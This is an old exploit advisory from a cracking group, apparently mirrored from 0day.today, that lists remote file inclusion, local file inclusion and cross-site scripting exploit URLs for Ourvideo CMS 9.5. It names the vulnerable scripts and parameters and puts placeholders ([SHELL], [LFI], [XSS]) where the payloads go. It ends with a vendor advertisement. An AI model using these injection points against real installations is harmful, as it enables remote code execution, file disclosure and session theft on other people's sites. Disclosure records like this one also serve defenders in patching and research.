Ourvideo CMS 9.5 Remote File Include, Local File Include, Cross-Site Scripting Vulnerabilitie
==============================================================
Ourvideo CMS 9.5 (RFI/LFI/XSS) Multiple Remote Vulnerabilities
==============================================================
-----------------------------------------------------------------------------¬
¦¦ C r a C k E r --
-- T H E C R A C K O F E T E R N A L M I G H T ¦¦
L-----------------------------------------------------------------------------
----- From The Ashes and Dust Rises An Unimaginable crack.... ----¬
-----------------------------------------------------------------------------¬
-- [ Remote File Include ] [ Local File Include ] [XSS] --
L-----------------------------------------------------------------------------
: Author : CraCkEr : : :
¦ Group : uNiTeD CraCkiNg ForCE ¦ ¦ ¦
¦ Script : Ourvideo CMS 9.5 ¦ ¦ Register Globals : ¦
¦ Download : SourceForge.net ¦ ¦ ¦
¦ Method : GET ¦ ¦ [-] ON [ ] OFF ¦
¦ Critical : High [--------] ¦ ¦ ¦
¦ Impact : System access ¦ ¦ ¦
¦ ------------------------------------- L----------------------------------- ¦
¦ DALnet #crackers --
L-----------------------------------------------------------------------------
: :
¦ Release Notes: ¦
¦ ============= ¦
¦ Typically used for remotely exploitable vulnerabilities that can lead to ¦
¦ system compromise. ¦
¦ ¦
-----------------------------------------------------------------------------¬
-- Exploit URL's --
L-----------------------------------------------------------------------------
[RFI]
http://localhost/path/phpi/edit_top_feature.php?include_connection=[SHELL]
http://localhost/path/phpi/edit_topics_feature.php?include_connection=[SHELL]
[LFI]
http://localhost/path/phpi/rss.php?prefix=[LFI]
[XSS]
http://localhost/path/phpi/login.php?top_page=[XSS]
http://localhost/path/phpi/login.php?end_page=[XSS]
L-----------------------------------------------------------------------------
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
-----------------------------------------------------------------------------¬
-- © CraCkEr 2008 --
L-----------------------------------------------------------------------------
# 0day.today [2018-04-03] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo